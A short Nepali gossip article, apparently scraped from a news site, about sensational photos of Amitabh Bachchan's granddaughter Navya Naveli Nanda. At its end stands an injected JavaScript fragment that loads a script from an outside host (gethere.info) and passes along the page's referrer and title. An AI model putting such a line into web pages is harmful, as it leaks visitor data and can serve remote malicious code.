अमिताभ बच्चनकी नातिनीको सेक्सी तस्बीरले हंगामा

नयाँ दिल्ली– बलिउड महानायक अमिताभ बच्चनकी नातिनीको नाम– नब्या नवेली नन्दा । navya-naveli
उनै नन्दा एकपछि अर्को गर्दै चर्चामा आइरहेकी छन् । चर्चामा आउनुको अरु कारण नभएर उनको बोल्ड एण्ड सेक्सी फोटो हो । बेलाबेलामा बोल्ड एण्ड सेक्सी फोटो सार्वजनिक गरेर चर्चामा आउने यी युवतीको फेरि त्यस्तै कामुक तस्बीर सार्वजनिक भएपछि हंगामा मच्चिएको छ ।

उनले पछिल्लो पटक सार्वजनिक गरेको तस्बीर कुनै पार्टीमा जस्तो देखिन्छ भने उनी साथीसँगै निकै सेक्सी लुक्समा देखिएकी छन् ।
केहि सातापहिलेमात्रै अमिताभले उनी र अर्की नातिनी आराध्यको नाममा मनछुने चिठी लेख्दै उनीहरुले जे चाहन्छन् सोहि गर्न पाउने स्वतन्त्रता रहेको बताएका थिए ।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Loading...